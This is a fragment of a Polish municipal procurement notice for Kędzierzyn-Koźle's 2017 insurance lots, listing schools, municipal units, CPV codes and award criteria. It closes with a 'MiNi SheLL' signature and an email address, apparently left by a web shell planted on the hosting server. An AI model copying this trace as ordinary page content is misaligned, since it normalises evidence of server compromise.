30.	Publiczna Szkoła Podstawowa nr 9 im. Jurija Gagarina, ul Gagarina 3, Kędzierzyn-Koźle
31.	Publiczna Szkoła Podstawowa nr 11 im. Władysława Broniewskiego, ul Partyzantów 30, Kędzierzyn-Koźle
32.	Publiczna Szkoła Podstawowa nr 12 im. Kadeta Zygmunta Kuczyńskiego, ul Piastowska 30, Kędzierzyn-Koźle
33.	Publiczna Szkoła Podstawowa nr 20, ul. Archimedesa 25, Kędzierzyn-Koźle
34.	Publiczne Gimnazjum nr 1 im. Orląt Lwowskich, ul. Grzegorza Piramowicza 30, Kędzierzyn-Koźle
35.	Publiczne Gimnazjum nr 3 im. Kardynała Stefana Wyszyńskiego, ul. Piotra Skargi 11, Kędzierzyn-Koźle
36.	Publiczne Gimnazjum nr 4 im. Karola Wojtyły, ul. 1 Maja 3, Kędzierzyn- Koźle
37.	Zespół Szkolno-Przedszkolny, ul. Jana Brzechwy 80;82, Kędzierzyn-Koźle
38.	Zespół Szkół Miejskich nr 1
- ul. Mieszka I nr 4, Kędzierzyn- Koźle 
- ul. Nowowiejska 8, Kędzierzyn-Koźle; 
39.	Zespół Szkół Miejskich nr 2, ul. Karola Szymanowskiego 19, Kędzierzyn-Koźle
40.	Zespół Szkół Miejskich nr 3, ul. Szkolna 3, Kędzierzyn-Koźle
41.	Zespół Szkół Miejskich nr 4, ul. Sławęcicka 96, Kędzierzyn-Koźle
42.	Zespół Szkół Miejskich nr 5, ul. Przodowników Pracy 13, Kędzierzyn- Koźle
43. Środowiskowy Dom Samopomocy PROMYCZEK, ul. Piotra Skargi 25, Kędzierzyn-Koźle
44. Miejski Ośrodek Sportu i Rekreacji, al. Jana Pawła II 29, Kędzierzyn-Koźle
45. Miejski Zakład Cmentarny, ul. Bałtycka 2, Kędzierzyn-Koźle
46. Miejski Zarząd Budynków Komunalnych, ul. Grunwaldzka 4-6, Kędzierzyn-Koźle

oraz w następujących komunalnych osobach prawnych:

47. Miejski Ośrodek Kultury, al. Jana Pawła II nr 27, Kędzierzyn-Koźle
48. Miejska Biblioteka Publiczna, ul. Rynek 3, Kędzierzyn Koźle
49. Muzeum Ziemi Kozielskiej w Organizacji, ul. Kraszewskiego 5B, Kędzierzyn-Koźle
50. Regionalne Centrum Zagospodarowania i Unieszkodliwiania Odpadów Czysty Region Sp. z o.o., ul. Naftowa 7, Kędzierzyn-Koźle
51. Usługi Komunalne Sp. z o.o. w Kędzierzynie-Koźlu, ul. Grunwaldzka 42/44, Kędzierzyn-Koźle 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66515000-3,
                    66516000-0,
                    66512100-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena łączna ubezpieczenia </td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>30</td></tr><tr><td>Pozostałe kryteria oceny ofert </td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r. w zakresie ubezpieczeń komunikacyjnych: ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych, ubezpieczenie auto casco, ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów, ubezpieczenie assistance.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle oraz komunalnych osób prawnych w Kędzierzynie-Koźlu w 2017r. w zakresie ubezpieczeń komunikacyjnych:
ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,
ubezpieczenie auto casco,
ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów,
ubezpieczenie assistance.

w następujących jednostkach organizacyjnych Gminy Kędzierzyn-Koźle:
1.	Urząd Miasta Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, Kędzierzyn-Koźle
Wydział Administracyjno-Gospodarczy
Wydział Zarządzania Kryzysowego
Wydział Zarządzania Drogami 
Straż Miejska
2.	Miejski Ośrodek Sportu i Rekreacji, al. Jana Pawła II 29, Kędzierzyn-Koźle
3.	Miejski Zakład Cmentarny, ul. Bałtycka 2, Kędzierzyn-Koźle
4.	Miejski Zarząd Budynków Komunalnych, ul. Grunwaldzka 4-6, Kędzierzyn-Koźle

oraz w następujących komunalnych osobach prawnych:
1.	Miejski Ośrodek Kultury, al. Jana Pawła II nr 27, Kędzierzyn-Koźle
2.	Regionalne Centrum Zagospodarowania i Unieszkodliwiania Odpadów Czysty Region Sp. z o.o., ul. Naftowa 7, Kędzierzyn-Koźle
3.	Usługi Komunalne Sp. z o.o. w Kędzierzynie-Koźlu, ul. Grunwaldzka 42/44, 
Kędzierzyn-Koźle 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66512100-3,
                    66514110-0,
                    66516100-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena łączna ubezpieczenia </td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Ubezpieczenie Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczeń następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych Gminy Kędzierzyn-Koźle: - ubezpieczenie imienne, - ubezpieczenie bezimienne.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ubezpieczenie Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczeń następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych Gminy Kędzierzyn-Koźle:
- ubezpieczenie imienne,
- ubezpieczenie bezimienne.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66512100-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena łączna ubezpieczenia </td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczenia jednostek pływających: -	ubezpieczenie casco  -	ubezpieczenie odpowiedzialności cywilnej  -	ubezpieczenie nnw pasażerów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn-Koźle w 2017 r. w zakresie ubezpieczenia jednostek pływających:
-	ubezpieczenie casco 
-	ubezpieczenie odpowiedzialności cywilnej 
-	ubezpieczenie nnw pasażerów
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66516300-3,
                    66514150-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena łączna ubezpieczenia </td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com